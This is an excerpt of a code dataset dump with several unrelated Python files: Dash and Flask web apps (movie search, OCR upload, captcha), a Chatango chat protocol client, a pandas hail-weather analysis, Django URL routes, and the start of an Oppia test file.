'n_clicks'),\n State(component_id = 'my_input', component_property = 'value'),\n\n)\n\ndef search_movie_image(n_clicks,my_input):\n \n df = get_movie_data_using_title(my_input)\n src = df['Movie Poster Link'][0]\n \n alert_msg = \"Movie Poster Generated!\"\n alert = dbc.Alert(alert_msg, color=\"success\", duration = 4000, dismissable=True)\n return alert, src\n\n\n@app.callback(\n [\n Output(component_id = 'my-title', component_property = 'children'),\n Output(component_id = 'my-rating', component_property = 'children'),\n Output(component_id = 'my-genre', component_property = 'children'),\n Output(component_id = 'my-cast', component_property = 'children'),\n Output(component_id = 'my-duration', component_property = 'children'),\n Output(component_id = 'my-parental_rating', component_property = 'children'),\n Output(component_id = 'my-release_date', component_property = 'children'),\n Output(component_id = 'my-director', component_property = 'children'),],\n Input(component_id = 'sbumit_buttom', component_property = 'n_clicks'),\n State(component_id = 'my_input', component_property = 'value'),\n)\n\ndef display_name(button, value):\n \n df = get_movie_data_using_title(value)\n title = df['Movie Title'][0]\n rating = df['Rating'][0]\n genre = df['Genre'][0]\n cast = df['Cast'][0]\n duration = df['Duration'][0]\n parental_rating = df['Parental Rating'][0]\n release_date = df['Release Date'][0]\n director = df['Director'][0]\n \n return title, 'Rating : {} / 10'.format(rating), 'Genre : {}'.format(genre), 'Cast : {}'.format(cast), 'Duration : {}'.format(duration), 'Parental Rating : {}'.format(parental_rating), 'Release Date : {}'.format(release_date), 'Director : {}'.format(director)\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8060)\n \n\n\n","sub_path":"Movie_Searcher.py","file_name":"Movie_Searcher.py","file_ext":"py","file_size_in_byte":14018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"34729849","text":"import logging\nimport time\nfrom flask import Flask, request\nfrom flask import jsonify\nfrom flask_restful import Resource\n\nfrom controllers.scanned_to_machined import read_scanned_pdf\nfrom exceptions.exceptions_handler import *\nfrom constant import PDF_UPLOAD_DIRECTORY, PROJECT_ROOT, REFERENCE_FILE\nfrom os import path\nimport os\nimport subprocess\nimport copy \n\nfrom lib.common_methods import populate_missing\nfrom lib.parse_data import get_test_data, get_extraction, get_fidelity_extraction, extract_data\n#from openpyxl import Workbook\n#import openpyxl\nimport uuid\n\nclass FidelityData(Resource):\n\n\n\t\tdef get(self):\n\t\t\t\treturn jsonify({\"data\": get_extraction()})\n\t\t\t\t#return jsonify({\"hello\":\"wassup!!\"})\n\n\n\t\tdef post(self):\n\t\t\t\ttry:\n\t\t\t\t\t\tts = time.time()\n\t\t\t\t\t\tsave_path = PDF_UPLOAD_DIRECTORY\n\t\t\t\t\t\tfile = request.files['file']\n\t\t\t\t\t\txml_file = request.files['xml_file']\n\t\t\t\t\t\txml_file_name = xml_file.filename.replace(' ', '_')\n\n\t\t\t\t\t\tfile_name = file.filename.replace(' ', '_')\n\t\t\t\t\t\tfile_name_without_ext = os.path.basename(file_name).split('.')[0]\n\t\t\t\t\t\tfile_name_without_ext = file_name_without_ext + \"_\" + str(uuid.uuid1())\n\t\t\t\t\t\textension = path.splitext(file_name)[1]\n\t\t\t\t\t\tfile_name = file_name_without_ext + extension #path.splitext(file_name)[1]\n\t\t\t\t\t\tdoc_dir_location = os.path.join(save_path, file_name_without_ext)\n\t\t\t\t\t\tif not os.path.exists(doc_dir_location):\n\t\t\t\t\t\t\t\tos.makedirs(doc_dir_location)\n\t\t\t\t\t\tfile_location = os.path.join(doc_dir_location, file_name)\n\t\t\t\t\t\txml_file_location = \"\"\n\t\t\t\t\t\txml_file_location = os.path.join(doc_dir_location, xml_file_name)\n\t\t\t\t\t\tprint(f\"-----CML_file--->{xml_file_location}\")\n\t\t\t\t\t\txml_file.save( os.path.join(doc_dir_location, xml_file_name) )\n\t\t\t\t\t\tfile.save( file_location ) \n\n\n\t\t\t\t\t\t#erosion_val = [0, 3, 2, 4]\n\t\t\t\t\t\terosion_val = [0]\n\t\t\t\t\t\t#erosion_val = [0]\n\t\t\t\t\t\tmax_try = len(erosion_val) - 1\n\t\t\t\t\t\tfor index, e_val in enumerate(erosion_val):\n\t\t\t\t\t\t\t\tprint(\"EROSION_VALUE-------->\", e_val)\n\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif extension.lower() in ['.jpg', '.jpeg', '.png']:\n\t\t\t\t\t\t\t\t\t\tresult = read_scanned_image( file_location, doc_dir_location, e_val )\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tresult = read_scanned_pdf( file_location, doc_dir_location, e_val )\n\n \n\t\t\t\t\t\t\t\ttext_file_path = os.path.join(PDF_UPLOAD_DIRECTORY, file_name_without_ext, 'texts', 'stitched.txt')\n\t\t\t\t\t\t\t\t#with open( text_file_path ) as fp:\n\t\t\t\t\t\t\t\t#\t\tcontents = fp.readlines() \n \n\t\t\t\t\t\t\t\t#result = get_extraction()\n\t\t\t\t\t\t\t\t#result = get_fidelity_extraction(xml_file_location) \n\t\t\t\t\t\t\t\t#print(f\"1*****RESULT*****{result}\")\n\t\t\t\t\t\t\t\tresult = extract_data(os.path.join(PDF_UPLOAD_DIRECTORY, file_name_without_ext, 'texts'), xml_file_location) \n\t\t\t\t\t\t\t\t#print(f\"2*****RESULT*****{result}\")\n\t\t\t\t\t\t\t\tresult['pdf_file_path'] = 'pdf_file/'\t\t+ file_name_without_ext\n\t\t\t\t\t\t\t\tresult['excel_file_path'] = 'text_file/' + file_name_without_ext\n\t\t\t\t\t\t\t\t#parse_all_fields(contents, result) \n\n\t\t\t\t\t\t\t\tte = time.time()\n\t\t\t\t\t\t\t\tprint(f\"Time Taken---->{ts - te}\")\n\t\t\t\t\t\t\t\t#print(f\"Time Taken---->{result}\")\n\t\t\t\t\t\t\t\treturn jsonify( {\"data\": result} )\n\n\n\t\t\t\texcept CustomClassifierException as e:\n\t\t\t\t\t\tprint(\"1***ERROR***\", e)\n\t\t\t\t\t\tlogging.error(\"Error {} has occurred in controller\".format(e))\n\t\t\t\t\t\treturn e.response, e.http_code\n\n\t\t\t\texcept Exception as e:\n\t\t\t\t\t\tprint(\"2***ERROR***\", e)\n\t\t\t\t\t\tlogging.error(\"Error in service = {}\".format(e), exc_info=True)\n\t\t\t\t\t\treturn InternalServerErrorException(error_code=500,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\terror_message=\"Data Extraction failed!\").response, 500\n\n\t\t\t\tfinally:\n\t\t\t\t\t\tlogging.info(\"API Call Finished Successfully - 200\")\n\n\n\t\tdef create_template(self, template_path):\n\t\t\t\tsample_copy_path = \"/Users/shravanc/flask/aditya_birla/ocr-pdf-aditya-malaysia/sample_copy/sample.xlsx\"\n\t\t\t\t\n\n\t\t\t\ta = ['cp', sample_copy_path, template_path]\n\t\t\t\ttemplate_file = os.path.join(template_path, 'sample.xlsx')\n\t\t\t\tres = subprocess.check_output(a)\n\t\t\t\tprint(res)\n\t\t\t\treturn template_file\n\n","sub_path":"controllers/fidelity_data.py","file_name":"fidelity_data.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"177498129","text":"from flask import Flask,render_template,render_template_string\r\nimport os\r\nimport random\r\nfrom captcha.image import ImageCaptcha\r\nimage_captcha = ImageCaptcha()\r\nfrom io import BytesIO\r\nimport base64\r\n\r\nnumber_list = ['0','1','2','3','4','5','6','7','8','9']\r\n\r\nalphabet_lowercase = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\r\n\r\nalphabet_uppercase = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\r\n\r\ndef create_random_captcha_text(captcha_string_size=6):\r\n\r\n captcha_string_list = []\r\n\r\n base_char = alphabet_lowercase + alphabet_uppercase + number_list\r\n\r\n for i in range(captcha_string_size):\r\n\r\n # Select one character randomly.\r\n char = random.choice(base_char)\r\n\r\n # Append the character to the list.\r\n captcha_string_list.append(char)\r\n\r\n captcha_string = ''\r\n\r\n # Change the character list to string. \r\n for item in captcha_string_list:\r\n captcha_string += str(item)\r\n\r\n return captcha_string\r\n\r\ndef captchaimage():\r\n string = create_random_captcha_text()\r\n image = image_captcha.generate_image(string)\r\n #image2 = image_captcha.create_noise_dots(image,color=\"blue\")\r\n print(string)\r\n return string,image\r\n\r\napp = Flask(__name__,static_url_path = \"/static\", static_folder = \"static\")\r\n\r\n@app.route(\"/\",methods=['GET','POST'])\r\ndef cap_img():\r\n st,img = captchaimage()\r\n img_save= img.save(\"F:/bot/captcha/static/captcha.png\")\r\n #img_path = r\"F:\\bot\\captcha\"\r\n #image = os.path.join('F:\\\\bot\\captcha\\static\\\"+\"captcha.jpg');\r\n #path = \"/captcha.jpg\"\r\n #print(path)\r\n #old {{ url_for('static',filename='captcha.jpg') }}\r\n #new \"static/images/{{ employee.profile_image }}\" \"static/{{captcha}}\" ,captcha='captcha.jpg'\r\n\r\n figfile = BytesIO()\r\n img.save(figfile, format='png')\r\n figfile.seek(0)\r\n figdata_png = base64.b64encode(figfile.getvalue())\r\n result = str(figdata_png)[2:-1]\r\n\r\n html= ''' \r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n '''\r\n \r\n return render_template_string(html,result=result)\r\n\r\nif __name__ == '__main__': \r\n \r\n # run() method of Flask class runs the application \r\n # on the local development server. \r\n app.run(debug=True)","sub_path":"appy.py","file_name":"appy.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"37682701","text":"import logging\nfrom asyncio import Protocol\n\nfrom . import utils\nfrom . import callback\n\n\ndef log_message(logger, msg, *args, **kwargs):\n \"\"\"Custom log method for incoming messages.\"\"\"\n logger.log(MESSAGE, msg, *args, **kwargs)\n\nMESSAGE = logging.INFO - 1\nlogging.addLevelName(MESSAGE, \"MESSAGE\")\nlogging.getLoggerClass().message = log_message\n\n\nclass ChatangoProtocol(Protocol):\n\n \"\"\"Chatango base protocol for streaming data.\"\"\"\n\n logger_name = \"Chatango.Protocol\"\n msg_factory = utils.MessageFactory\n usr_factory = utils.User\n address = (\"localhost\", 5222)\n terminator = b\"\\r\\n\\x00\"\n encoding = \"utf-8\"\n seperator = \":\"\n\n def __init__(self, manager):\n \"\"\"Setup the connection based-off the manager.\"\"\"\n self.manager = manager\n self._callbacks = dict()\n self._connected = bool()\n self._active = bool(1)\n\n def connection_made(self, transport):\n \"\"\"Connection to server has been established.\"\"\"\n self.logger.info(\"Connection established.\")\n self.transport = transport\n self._connected = True\n self.login()\n\n def connection_lost(self, exception):\n \"\"\"Connection to server has been abolished.\"\"\"\n self._active, self._connected = False, False\n self.logger.info(\"Connection abolished.\")\n if exception:\n reason = utils.uncamelcase(type(exception).__name__)\n self.logger.debug(\"Connection lost due to: %s\", reason)\n\n def data_received(self, raw):\n \"\"\"Data was recevied from the underlaying socket.\"\"\"\n self.logger.debug(\"Raw Recv: %r\", raw.split(self.terminator)[:-1])\n for rawdata in raw.split(self.terminator)[:-1]:\n self.logger.debug(\"Recv: %r\", rawdata)\n data = rawdata.decode(self.encoding).split(self.seperator)\n command, params = utils.camelcase(data[0] or \"Pong\"), data[1:]\n handle = self.handle_command(command, *params)\n if handle is NotImplemented:\n self.handle_NotImplemented(command, *params)\n\n def handle_command(self, command, *params):\n \"\"\"Handle the incoming event/command.\"\"\"\n method = getattr(self, \"cmd_%s\" % command, None)\n if callable(method):\n try:\n method(*params)\n except:\n self.logger.execption(\"Error in handling %s\", command)\n else:\n return NotImplemented\n\n def handle_NotImplemented(self, command, *params):\n \"\"\"Handle for the commands that are not implemented (yet).\"\"\"\n pass\n\n def login(self):\n \"\"\"Execute the command for logging into the server.\"\"\"\n pass\n\n def logout(self):\n \"\"\"Execute the command for logging out from the server.\"\"\"\n self.transport.close()\n\n def sendCommand(self, cmd, *args):\n data = \":\".join(map(str, (cmd,)+args)).encode(self.encoding)\n self.transport.write(data + self.terminator)\n self.logger.debug(\"Sent: %r\", data)\n\n def sendHeartbeat(self):\n \"\"\"Send an heartbeat (stay-alive) signal to the server.\"\"\"\n self.sendCommand(\"\")\n\n def addCallback(self, *callbacks):\n for cb in callbacks:\n self._callbacks[cb] = cb(self)\n\n def delCallback(self, *callbacks):\n for cb in callbacks:\n if cb in self._callbacks:\n del self._callbacks[cb]\n\n @property\n def callbacks(self):\n return self._callbacks.values()\n\n @property\n def logger(self):\n \"\"\"Logger for the protocol.\"\"\"\n return logging.getLogger(self.logger_name)\n\n @property\n def isActive(self):\n \"\"\"Check if the protocol is active.\"\"\"\n return self._active\n\n @property\n def isConnected(self):\n \"\"\"Check if the connection is established.\"\"\"\n return self._connected\n\n\nclass ChatangoServerProtocol(ChatangoProtocol):\n\n logger_name = \"ChServer.Protocol\"\n\n def __init__(self, manager):\n \"\"\"Setup an server protocol and include an message queue.\"\"\"\n from queue import Queue\n super().__init__(manager)\n self.msg_queue = Queue()\n self.msg_queue.put(\"help\")\n\n\nclass PrivateMessages(ChatangoProtocol):\n\n \"\"\"Chatango Private Messages Protocol.\"\"\"\n\n logger_name = \"Chatango.PrivMsgs\"\n msg_factory = utils.PmMessageFactory\n address = (\"c1.chatango.com\", 5222)\n\n def cmd_Ok(self):\n \"\"\"Granted server access.\"\"\"\n self.logger.info(\"Server Access: Granted\")\n self.signedOn()\n\n def cmd_Denied(self):\n \"\"\"Denied server access.\"\"\"\n self.logger.critical(\"Server Access: Denied\")\n self.logout()\n\n def cmd_Msg(self, user, name, _1, time_, _2, *msg_parts):\n \"\"\"An message was received from another user.\"\"\"\n message = self.seperator.join(msg_parts)\n msg = self.msg_factory.incoming.build(message)\n usr = self.usr_factory(user)\n self.recvMessage(usr, msg, offline=False)\n\n def cmd_Msgoff(self, user, name, _1, time_, _2, *msg_parts):\n \"\"\"An message was received from another user, while offline.\"\"\"\n message = self.seperator.join(msg_parts)\n msg = self.msg_factory.incoming.build(message)\n usr = self.usr_factory(user)\n self.recvMessage(usr, msg, offline=True)\n\n def login(self):\n \"\"\"Execute the command for logging into the server.\"\"\"\n if self.authkey:\n self.sendCommand(\"tlogin\", self.authkey, 2)\n else:\n self.logger.critical(\"Invalid credentials - Force closing...\")\n self.manager.stop()\n\n def sendMessage(self, user, message):\n \"\"\"Send an message to another user.\"\"\"\n msg = self.msg_factory.outgoing.build(str(message))\n self.sendCommand(\"msg\", user, msg)\n\n @callback.method\n def signedOn(self):\n \"\"\"Handle signing onto the server.\"\"\"\n pass\n\n @callback.method\n def recvMessage(self, user, message, offline=False):\n \"\"\"Handle receiving an message from another user.\"\"\"\n self.logger.message(\"%s: %s\", user, message)\n # self.sendMessage(user, message)\n\n @property\n def authkey(self):\n \"\"\"Authentication key for signing in.\"\"\"\n from urllib.request import install_opener, build_opener, urlopen\n from urllib.request import HTTPCookieProcessor, URLError\n import http.cookiejar\n import urllib.parse\n if self.manager.running_locally:\n return \".\".join(self.manager.credentials)\n cookiejar = http.cookiejar.CookieJar()\n install_opener(build_opener(HTTPCookieProcessor(cookiejar)))\n urlopen(\"http://chatango.com/login\", urllib.parse.urlencode(dict(\n user_id=self.manager.credentials.username,\n password=self.manager.credentials.password,\n storecookie=\"on\", checkerrors=\"yes\")).encode())\n cookies = dict((cookie.name, cookie.value) for cookie in cookiejar)\n return cookies.get(\"auth.chatango.com\", \"\")\n\n\n\nclass PrivateMessagesServer(ChatangoServerProtocol):\n\n logger_name = \"ChServer.PrivMsgs\"\n msg_factory = utils.PmMessageFactory\n\n def cmd_Tlogin(self, authkey, version):\n \"\"\"Client is requesting server access.\"\"\"\n self.sendCommand(\"ok\")\n self.sendMessage()\n\n def cmd_Msg(self, user, *msg_parts):\n \"\"\"Client is sending an message to another user.\"\"\"\n message = self.seperator.join(msg_parts)\n msg = self.msg_factory.incoming.build(message)\n self.logger.message(\"Client -> %s: %s\", user, msg)\n self.sendMessage()\n\n def sendMessage(self):\n if self.msg_queue.empty():\n self.logout()\n else:\n from time import time\n usr, msg = \"Server\", self.msg_queue.get()\n cmd, tmp, msg = \"msg\", \"?\", self.msg_factory.outgoing.build(msg)\n self.sendCommand(cmd, usr, usr, tmp, time(), tmp, msg)\n","sub_path":"Chatango/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"213283173","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.metrics import explained_variance_score, \\\n mean_absolute_error, \\\n median_absolute_error\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\n\n\nfeldbergHageltage = pd.read_csv('produkt_wetter_tag_19490101_20140131_01346.txt', sep=\";\")\n\n# Mess_Datum in Datentyp Datetime umwandeln und als Index setzen\nfeldbergHageltage['MESS_DATUM'] = pd.to_datetime(arg=feldbergHageltage['MESS_DATUM'], format='%Y%m%d')\nfeldbergHageltage.set_index('MESS_DATUM', inplace=True)\n\nfeldbergWetter = pd.read_csv('produkt_klima_tag_19450101_20201231_01346.txt', sep=\";\")\nfeldbergWetter['MESS_DATUM'] = pd.to_datetime(arg=feldbergWetter['MESS_DATUM'], format='%Y%m%d')\nfeldbergWetter.set_index('MESS_DATUM', inplace=True)\n\n# feldbergHageltage enthält nur noch Index und die Spalte HAGEL\nfeldbergHageltage = feldbergHageltage['HAGEL']\n# Spalte HAGEL in feldbergWetter angehängt\nfeldbergWetter['HAGEL'] = feldbergHageltage\n\n# Kontrolle welche Werte in der Spalte HAGEL auftreten = 0, 1, 99\n#feldbergWetter['HAGEL'].unique()\n\n# Löscht alle Zeilen in den irgendwo nan steht - löscht möglicherweise auch Zeilen die nicht gelöscht werden sollen\n#print(feldbergWetter.dropna())\n\n# Löscht alle Zeilen in der Spalte HAGEL in denen nan steht\nfeldbergWetter = feldbergWetter[feldbergWetter['HAGEL'].notna()]\n\n# Löschen der Spalten die irrelevant sind\nfeldbergWetter = feldbergWetter.drop(columns=['QN_3', 'QN_4', 'eor'])\n\n# Umbenennung der Spaltennamen\nfeldbergWetter = feldbergWetter.rename(columns={' FX': 'WindstaerkeMax',' FM': 'WindstaerkeMittel',\n ' RSK': 'Niederschlagshoehe', 'RSKF': 'Niederschlagsform', ' SDK': 'Sonnenscheindauer',\n 'SHK_TAG': 'Schneehoehe', ' NM': 'Bewoelkung', ' VPM': 'DampfdruckMittel',\n ' PM': 'LuftdruckMittel', ' TMK': 'TemperaturMittel', ' UPM': 'RelativeFeuchteMittel',\n ' TXK': 'LufttemperaturMax', ' TNK': 'LufttemperaturMin2m', ' TGK': 'LufttemperaturMin5cm',\n 'HAGEL': 'Hagel'})\n\n# ---------------------------------------------------------------------------------------\n# Zwischenstand : Datei mit Werten in Dataframe umgewandelt und Spalten eindeutig benannt.\n# Hagel in der Tabelle mit dem Wetter angehängt\n# Zeilen gelöscht in denen kein Wert für Hagel vorhanden ist\n# ---------------------------------------------------------------------------------------\n\n# Anzeigen der Spalten\n# print(feldbergWetter.columns)\n\n# Anzeigen aller Spalten bei einer Ausgabe mit 'print'\npd.set_option('max_columns', None)\n#print(feldbergWetter.head(20))\n\n\n# -999.0 Werte in jeder Spalte zählen / -999.0 = Fehlwert\nfehlwerteInSpalten = {\n 'fehlwerteWindstaerkeMax' : feldbergWetter.WindstaerkeMax==-999.0,\n 'fehlwerteWindstaerkeMittel' : feldbergWetter.WindstaerkeMittel==-999.0,\n 'fehlwerteNiederschlagshoehe' : feldbergWetter.Niederschlagshoehe==-999.0,\n 'fehlwerteNiederschlagsform' : feldbergWetter.Niederschlagsform==-999.0,\n 'fehlwerteSonnenscheindauer' : feldbergWetter.Sonnenscheindauer==-999.0,\n 'fehlwerteSchneehoehe' : feldbergWetter.Schneehoehe==-999.0,\n 'fehlwerteBewoelkung' : feldbergWetter.Bewoelkung==-999.0,\n 'fehlwerteDampfdruckMittel' : feldbergWetter.DampfdruckMittel==-999.0,\n 'fehlwerteLuftdruckMittel' : feldbergWetter.LuftdruckMittel==-999.0,\n 'fehlwerteTemperaturMittel' : feldbergWetter.TemperaturMittel==-999.0,\n 'fehlwerteRelativeFeuchteMittel' : feldbergWetter.RelativeFeuchteMittel==-999.0,\n 'fehlwerteLufttemperaturMax' : feldbergWetter.LufttemperaturMax==-999.0,\n 'fehlwerteLufttemperaturMin2m' : feldbergWetter.LufttemperaturMin2m==-999.0,\n 'fehlwerteLufttemperaturMin5cm' : feldbergWetter.LufttemperaturMin5cm==-999.0,\n 'fehlwerteHagel' : feldbergWetter.Hagel==-999.0\n}\ndf_Fehlwerte = pd.DataFrame(fehlwerteInSpalten)\n# Liefert die Anzahl der Fehlwerte in jeder Spalte\n#print(df_Fehlwerte.sum())\n\n# Spalte WindstaerkeMittel aufgrund zu vieler Fehlwerte droppen\n#feldbergWetter = feldbergWetter.drop(columns=['WindstaerkeMittel'])\n\n\n# verschiedene Plots zum Wetter\n\"\"\"\nplt.subplot(1, 3, 1, title = 'Windstaerke Max')\n#plt.plot(feldbergWetter.index, feldbergWetter['Schneehoehe'])\nplt.plot(feldbergWetter.index, feldbergWetter['WindstaerkeMax'])\nplt.subplot(1, 3, 2, title = 'Windstaerke Mittel')\nplt.plot(feldbergWetter.index, feldbergWetter['WindstaerkeMittel'])\nplt.subplot(1, 3, 3, title = 'Hagel')\nplt.plot(feldbergWetter.index, feldbergWetter['Hagel'])\n#plt.plot(feldbergWetter.index[1000:1100], feldbergWetter['WindstaerkeMax'][1000:1100])\nplt.show()\n\"\"\"\n\n# verschiedene Boxplots um mögliche Zusammenhänge zu erkennen\n\"\"\"\nfig, ax = plt.subplots(1, 3)\nsns.boxplot(x='Hagel', y='Niederschlagshoehe', data=feldbergWetter, ax=ax[0])\nsns.boxplot(x='Hagel', y='Bewoelkung', data=feldbergWetter, ax=ax[1])\nsns.boxplot(x='Hagel', y='RelativeFeuchteMittel', data=feldbergWetter, ax=ax[2])\nplt.show()\n\"\"\"\n\n# Test ob ein Zusammenhang zwischen den Spalten zu erkennen ist\n#print(feldbergWetter.corr())\n\n# Droppen der Spalte Windstaerke Mittel, aufgrund zuvieler Fehlwerte\nfeldbergWetter = feldbergWetter.drop(columns=['WindstaerkeMittel'])\n\n# Löschen aller Zeilen bis zum 1.1.1955\nfeldbergWetter.drop(feldbergWetter.loc['1949-01-01':'1954-12-31'].index, inplace=True)\n\n# Fehlwerte ersetzen\nfeldbergWetter.replace(-999.0, np.nan, inplace=True)\n# NaN-Werte werden durch linear interpolierte Werte, mit dem Wert vor und nach der Spalte ersetzt\nfeldbergWetter.interpolate(inplace=True)\n\n# Plot WindstaerkeMax mit bereinigten Werten\n\"\"\"\nplt.plot(feldbergWetter.index, feldbergWetter['WindstaerkeMax'])\nplt.xlabel('Datum')\nplt.ylabel('Windstaerke')\nplt.show()\n\"\"\"\n\n# Boxplots zum Vergleich der Spalten mit Hagel\n\"\"\"\nfig, ax = plt.subplots(2, 6)\nsns.boxplot(x='Hagel', y='WindstaerkeMax', data=feldbergWetter, ax=ax[0, 0])\nsns.boxplot(x='Hagel', y='Niederschlagshoehe', data=feldbergWetter, ax=ax[0, 1])\nsns.boxplot(x='Hagel', y='Niederschlagsform', data=feldbergWetter, ax=ax[0, 2])\nsns.boxplot(x='Hagel', y='Sonnenscheindauer', data=feldbergWetter, ax=ax[0, 3])\nsns.boxplot(x='Hagel', y='Schneehoehe', data=feldbergWetter, ax=ax[0, 4])\nsns.boxplot(x='Hagel', y='Bewoelkung', data=feldbergWetter, ax=ax[0, 5])\nsns.boxplot(x='Hagel', y='DampfdruckMittel', data=feldbergWetter, ax=ax[1, 0])\nsns.boxplot(x='Hagel', y='LuftdruckMittel', data=feldbergWetter, ax=ax[1, 1])\nsns.boxplot(x='Hagel', y='TemperaturMittel', data=feldbergWetter, ax=ax[1, 2])\nsns.boxplot(x='Hagel', y='RelativeFeuchteMittel', data=feldbergWetter, ax=ax[1, 3])\nsns.boxplot(x='Hagel', y='LufttemperaturMax', data=feldbergWetter, ax=ax[1, 4])\nsns.boxplot(x='Hagel', y='LufttemperaturMin2m', data=feldbergWetter, ax=ax[1, 5])\nplt.show()\n\"\"\"\n\n# X will be a pandas dataframe of all columns except Hagel\nX = feldbergWetter[[col for col in feldbergWetter.columns if col != 'Hagel']]\n\n# y will be a pandas series of the meantempm\ny = feldbergWetter['Hagel']\n\n# split data into training set and a temporary set using sklearn.model_selection.traing_test_split\n#X_train, X_tmp, y_train, y_tmp = train_test_split(X, y, test_size=0.2, random_state=23)\nX_train, X_tmp, y_train, y_tmp = train_test_split(X, y, test_size=0.2, shuffle=False)\n\n# take the remaining 20% of data in X_tmp, y_tmp and split them evenly\n#X_test, X_val, y_test, y_val = train_test_split(X_tmp, y_tmp, test_size=0.5, random_state=23)\nX_test, X_val, y_test, y_val = train_test_split(X_tmp, y_tmp, test_size=0.5,shuffle=False)\n\nX_train.shape, X_test.shape, X_val.shape\nprint(\"Training instances {}, Training features {}\".format(X_train.shape[0], X_train.shape[1]))\nprint(\"Validation instances {}, Validation features {}\".format(X_val.shape[0], X_val.shape[1]))\nprint(\"Testing instances {}, Testing features {}\".format(X_test.shape[0], X_test.shape[1]))\n\nprint(X_train.head(5))","sub_path":"Feldberg_Analyse_DatenSplitten.py","file_name":"Feldberg_Analyse_DatenSplitten.py","file_ext":"py","file_size_in_byte":7978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"100002216","text":"from django.conf.urls import include, url\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.views.generic import TemplateView\r\nfrom .views.admin import auth\r\nfrom .views.admin.PostView import PostView\r\nfrom .views.admin.CategoryView import CategoryView\r\nfrom .views.admin.ImageView import ImageView\r\nfrom .views.blog.PostListView import PostListView\r\nfrom .views.blog.PostDetailView import PostDetailView\r\nfrom .app.posts_table import PostsTable\r\nfrom .app.categories_table import CategoriesTable\r\nfrom itertools import chain\r\n\r\nroutes = {\r\n# 'blog': [\r\n# url(r'^$', blog.index, name='index'),\r\n# url(r'^posts/(?P[0-9]+)/(?P[0-9]+)$', blog.index, name='index'),\r\n# url(r'^post/(?P[0-9]+)/$', blog.post, name='post'),\r\n# url(r'^category/(?P[0-9]+)/$', blog.category, name='category'),\r\n# ],\r\n 'blog': [\r\n url(r'^$', PostListView.as_view()),\r\n url(r'^post/(?P[0-9]+)/$', PostDetailView.as_view()),\r\n ],\r\n 'admin_auth': [\r\n url(r'^admin/$', auth.index, name='admin.index'),\r\n url(r'^admin/auth/attempt/$', auth.attempt, name='admin.auth.attempt'),\r\n url(r'^admin/auth/logout/$', auth.log_out, name='admin.auth.logout'),\r\n url(r'^admin/auth/dashboard/$', auth.dashboard, name='admin.auth.dashboard'),\r\n ],\r\n 'posts': [\r\n url(r'^admin/posts/index/$', login_required(\r\n TemplateView.as_view(template_name='_admin/posts/index.html')),\r\n name='admin.post.index'\r\n ),\r\n url(r'^admin/posts/$', login_required(PostView.as_view()), name='admin.post'),\r\n url(r'^admin/posts/table/$', login_required(PostsTable.as_view()), name='admin.post.table'),\r\n ],\r\n 'category': [\r\n url(r'^admin/categories/index/$', login_required(\r\n TemplateView.as_view(template_name='_admin/categories/index.html')),\r\n name='admin.category.index'\r\n ),\r\n url(r'^admin/categories/$', login_required(CategoryView.as_view()), name='admin.category'),\r\n url(r'^admin/categories/table/$', login_required(CategoriesTable.as_view()), name='admin.category.table'),\r\n ],\r\n 'image': [\r\n url(r'^admin/images/index/$', login_required(\r\n TemplateView.as_view(template_name='_admin/images/index.html')),\r\n name='admin.image.index'\r\n ),\r\n url(r'^admin/images/$', login_required(ImageView.as_view()), name='admin.image')\r\n ]\r\n}\r\n\r\nurlpatterns = list(chain(*routes.values()))\r\n\r\n#urlpatterns = [\r\n# url(r'^$', blog.index, name='index'),\r\n# url(r'^posts/(?P[0-9]+)/(?P[0-9]+)$', blog.index, name='index'),\r\n# url(r'^post/(?P[0-9]+)/$', blog.post, name='post'),\r\n# url(r'^category/(?P[0-9]+)/$', blog.category, name='category'),\r\n# \r\n# url(r'^admin/$', auth.index, name='admin.index'),\r\n# url(r'^admin/auth/attempt/$', auth.attempt, name='admin.auth.attempt'),\r\n# url(r'^admin/auth/logout/$', auth.log_out, name='admin.auth.logout'),\r\n#]\r\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"66250241","text":"# coding: utf-8\n#\n# Copyright 2014 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for Email-related jobs.\"\"\"\n\nimport datetime\nimport types\n\nfrom core.domain import email_jobs_one_off\nfrom core.platform import models\nfrom core.tests import test_utils\nimport feconf\n\n(email_models,) = models.Registry.import_models([models.NAMES.email])\n\ntaskqueue_services = models.Registry.import_taskqueue_services()\n\n\nclass EmailHashRegenerationOneOffJobTests(test_utils.GenericTestBase):\n \"\"\"Tests for the one-off update hash job.\"\"\"\n\n def _run_one_off_job(self):\n \"\"\"Runs the one-off MapReduce job.\"\"\"\n job_id = 